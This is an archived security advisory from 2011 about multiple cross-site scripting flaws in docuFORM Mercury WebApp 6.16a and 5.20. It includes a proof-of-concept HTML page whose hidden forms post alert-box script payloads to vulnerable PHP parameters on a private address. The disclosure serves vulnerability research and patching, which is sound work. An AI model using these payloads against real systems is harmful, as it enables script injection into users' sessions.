docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting: Posted Apr 20, 2011; Authored by LiquidWorm | Site zeroscience.mk; docuFORM Mercury versions 6.16a and 5.20 suffer from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 04fd5a5de85dc05c646203a774ae5ea162a41d6deb351adee000c5cda968c91d; Download | Favorite | View

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

<!--


docuFORM Mercury WebApp 6.16a/5.20 Multiple Cross-Site Scripting Vulnerabilities


Vendor: docuFORM GmbH
Product web page: http://www.docuform.de
Affected version: 6.16a and 5.20

Summary: Unlimited options for production printing and customer solutions.

Desc: The Mercury Web Application suffers from multiple XSS vulnerabilities when
parsing user input thru the GET parameter 'this_url' and the POST parameter 'aa_sfunc'
in f_state.php, f_list.php, f_job.php and f_header.php scripts. Attackers can exploit
these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Tested on: Mercury HTTP and Database Server 6.16

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic


Advisory ID: ZSL-2011-5010
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5010.php


14.04.2011


-->


<html><title>docuFORM Mercury WebApp 6.16a Multiple Cross-Site Scripting Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br /><br />
<form action="http://192.168.16.100:8181/Mercury/f_state.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="aa_afunc" value="call" />
<input type="hidden" name="aa_sfunc" value="1<script>alert(1)</script>" />
<input type="hidden" name="aa_cfunc" value="OnAgentGetDeviceList" />
<input type="hidden" name="aa_sfunc_args%5B%5D" value="0" /></form>
<form action="http://192.168.16.100:8181/Mercury/f_state.php" enctype="application/x-www-form-urlencoded" method="GET" id="xss2">
<input type="hidden" name="ajaxagent" value="js" />
<input type="hidden" name="this_url" value="1--><script>alert(2)</script>" /></form>
<a href="javascript:xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>'aa_sfunc' param</h3></center></font></b></a><br />
<a href="javascript:xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>'this_url' param</h3></center></font></b></a><br />
</body></html>

Top Authors In Last 30 Days

Red Hat 317 files
Ubuntu 66 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 8 files
Google Security Research 6 files
Milad Karimi 6 files
Yevhenii Butenko 4 files
Jann Horn 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,477)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,700)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,478)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

Share This

docuFORM Mercury WebApp 6.16a / 5.20 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems